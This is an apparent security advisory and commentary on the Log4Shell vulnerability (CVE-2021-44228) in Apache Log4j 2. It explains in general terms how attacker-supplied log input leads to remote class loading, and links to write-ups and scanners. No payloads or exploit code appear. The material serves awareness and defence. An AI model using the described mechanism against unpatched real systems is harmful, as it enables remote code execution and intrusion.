h0w1tzr’s Commentary: This is a REALLY nasty bug that has been not only seen in the wild but wormable payloads have also been seen. This is just the tip of the iceberg. It affects everything from Apache Web Servers to VMware vSphere to Atlassian Jira to Ghidra to ICS devices. Essentially anything that is written in Java could be potentially be exploited. This is probably the worst bug since Heartbleed with even more ramifications. The good news, if there is any, is that this vulnerability doesn’t break out of the Java Virtual Machine (JVM) but you can remotely load Java classes that are being used to download a secondary payload.
On December 9, 2021, the Log4j vulnerability, tracked as CVE-2021-44228, was publicly revealed via the project’s GitHub. This page collects all the intelligence that Randori has gathered since the release of the vulnerability that impacts many types of software, and likely billions of devices.
This vulnerability, which was discovered by Chen Zhaojun of Alibaba Cloud Security Team, impacts Apache Log4j 2 versions 2.0 to 2.14.1.
This weakness allows arbitrary code execution. A logging utility such as Log4j is meant to allow developers to log various types of data within their applications, this data is typically based on user inputs, but does not have to be.
The Log4j vulnerability allows an attacker to load any code they want via the Log4j logging structure. Threat actors can point the logging protocol to a Java library of their choosing, and it would automatically load the target.
We estimate Log4j to be as far reaching as the Heartbleed vulnerability and Shellshock combined. More than 2.5 billion devices running Java, coupled with the fact this vulnerability is extremely easy to exploit, means the impact is likely very far reaching
Links
-
- Randori Article: https://www.randori.com/log4j-zero-day/
- Randori VMSA-2021-0028: VMware Log4Shell Impact & Remediations: https://www.randori.com/blog/vmsa-2021-0028-vmware-log4shell-impact-remediations/
- GreyNoise Exploit activity for Apache Log4j vulnerability – CVE-2021-44228: https://www.greynoise.io/blog/apache-log4j-vulnerability-CVE-2021-44228
- GitHub Log4j overview related software: https://github.com/NCSC-NL/log4shell/tree/main/software
- CloudFlare Actual CVE-2021-44228 payloads captured in the wild: https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/
- BlackHills YouTube Video: https://www.youtube.com/watch?v=igoDXnkYDy8
- Rumble Finding applications that use Log4J: https://www.rumble.run/blog/finding-log4j/
- Randori & GreyNoise Webinar: https://vital.wistia.com/medias/qo6vlome2r
Scanners
-
- BurpSuite Plugin: https://github.com/portswigger/log4shell-scanner
- LanSweeper Log4j Vulnerable Software Scanner: https://www.lansweeper.com/report/log4j-vulnerable-software-audit/
- Fenrir Log4Shell Scanner: https://github.com/Neo23x0/Fenrir